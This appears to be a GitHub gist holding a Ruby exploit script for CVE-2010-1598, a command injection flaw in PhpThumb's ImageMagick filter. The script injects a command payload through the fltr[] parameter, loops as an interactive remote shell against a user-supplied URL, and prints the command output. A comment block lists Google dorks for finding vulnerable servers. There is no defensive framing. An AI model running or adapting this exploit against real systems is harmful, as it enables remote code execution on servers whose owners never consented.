Skip to content

Instantly share code, notes, and snippets.

@komodoooo
Created September 20, 2022 18:33
Show Gist options
  • Save komodoooo/4b5d09e924418ea2654baee25905f851 to your computer and use it in GitHub Desktop.
Save komodoooo/4b5d09e924418ea2654baee25905f851 to your computer and use it in GitHub Desktop.
CVE-2010-1598 exploit via "ImageMagick" extension.
require 'net/http'
require 'cgi'
puts """
CVE-2010-1598
PhpThumb OS command injection exploit\n
by Komodo\n
"""
=begin
Google dork to search vulnerable targets:
inurl:phpThumb.php Deprecated: Function eregi() is deprecated in /home/
inurl:"/scripts/phpthumb"
(most of this may not work)
=end
def main(target)
payload = "?src=file.jpg&fltr[]=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;---;%20&phpThumbDebug=9"
while true
print "$ ";command = gets.chomp
target.delete_suffix!("/") unless target[-1..-1] != "/"
uwu = "#{target.chomp}/phpThumb.php"+payload.gsub("---", CGI.escape(command))
r = Net::HTTP.get_response(URI(uwu))
if r.code == "200"
if r.body.include?("ImageMagick failed with message")
begin
puts "\n#{r.body.match(/ImageMagick failed with message(.*)sh: -quality: command not found/m)[1].strip.split('(')[1]}\n"
rescue TypeError, NoMethodError
puts "Null output"
end
else
puts "Maybe the target is not vulnerable"
end
else
puts r.code
end
end
end
begin
print "Url: "
main(gets.chomp)
rescue => e
puts e
end
@komodoooo
Copy link
Author

komodoooo commented Jun 24, 2023

Unfortunately, most of the results indexed by google are no more vulnerable greet because the cve is relatively old.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment